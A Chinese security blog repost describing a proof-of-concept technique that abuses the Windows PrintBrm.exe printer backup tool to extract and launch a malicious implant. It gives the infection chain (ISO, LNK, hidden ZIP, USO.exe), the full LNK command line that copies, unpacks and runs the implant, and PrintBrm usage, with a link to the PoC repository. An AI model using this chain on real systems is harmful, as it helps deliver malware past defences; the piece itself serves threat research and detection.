通过打印机备份工具执行植入恶意EXE工具

逆向病毒分析 2个月前 admin

75 0 0

关于 PrintBrm.exe

PrintBrm.exe – 打印机备份恢复迁移工具
路径：%windir%System32spooltoolsPrintBrm.exe
用于从 ZIP 存档中提取文件
因此，LOLBIN

概念证明

看到了以下推文，其中威胁者使用 PrintBrm 提取并执行植入。考虑为其创建一个 PoC。https://twitter.com/h2jazi/status/1638923200527474691

感染链

以包含 LNK 文件以及隐藏的 ZIP 存档的 ISO 文件开始。
一旦 LNK 文件被执行。

它将 ZIP 存档复制到 ProgramData 中
使用 PrintBrm.exe 将存档中的文件提取到 ProgramData 中的另一个文件夹中
提取的文件“USO.exe”是植入程序，然后由 LNK 文件执行。

可以从“PoC-ISO”文件夹下载演示以下感染链的概念验证 ISO 文件

注意：在这种情况下，应使用用法中提到的命令从 PrintBrm 实用程序生成 ZIP 存档

LNK 文件的参数：

%windir%/system32/cmd.exe /c xcopy .USO.zip %programdata% /h /y && %windir%System32spooltoolsPrintBrm.exe -r -f %programdata%USO.zip -d %programdata%usosharingdriver && start %programdata%usosharingdriverUSO.exe

通过打印机备份工具执行植入恶意EXE工具

用法-PrintBrm.exe

-r - Restore the configuration in the file to the server.-f file_name   The backup file.-d directory   Unpack the backup file to the directory (with -r),                  or repack a backup file from the directory (with -b).
PrintBrm Commands
Pack the files from the Directory to ZIP
PrintBrm.exe -b -f <out_zip_path> -d <directory_to_pack>
Unpack the ZIP to the Directory
PrintBrm.exe -r -f <unpack_zip_path> -d <unpack_files_directory_path>

https://github.com/knight0x07/PoC-Malware-TTPs/tree/main/PrintBrm-Impant-Exec

感谢您抽出

来阅读本文

通过打印机备份工具执行植入恶意EXE工具

点它，分享点赞在看都在这里

原文始发于微信公众号（Ots安全）：通过打印机备份工具执行植入恶意EXE工具

版权声明：admin 发表于 2024年7月15日上午11:09。
转载请注明：通过打印机备份工具执行植入恶意EXE工具 | CTF导航

第85篇：顶级加密勒索组织LockBit的杀伤链模型与技战法分析（中篇）

admin

波音遭遇勒索暴露的关基系统防御的七大问题

admin

流行木马ISO恶意文件简单分析

admin

653

微信界面逆向分析

admin

428

BatLoader在路过式网络攻击中冒充Midjourney和ChatGPT

admin

207

DarkGate – Threat Breakdown Journey

admin

286

通过打印机备份工具执行植入恶意EXE工具

对学校服务器挖矿木马的一次逆向分析

威胁情报 |Patchwork 组织更新武器库，首次利用 Brute Ratel C4 和 PGoshell 增强版发起攻击

相关文章

相关文章

通过打印机备份工具执行植入恶意EXE工具

对学校服务器挖矿木马的一次逆向分析

威胁情报 |Patchwork 组织更新武器库，首次利用 Brute Ratel C4 和 PGoshell 增强版发起攻击

相关文章

广告位

相关文章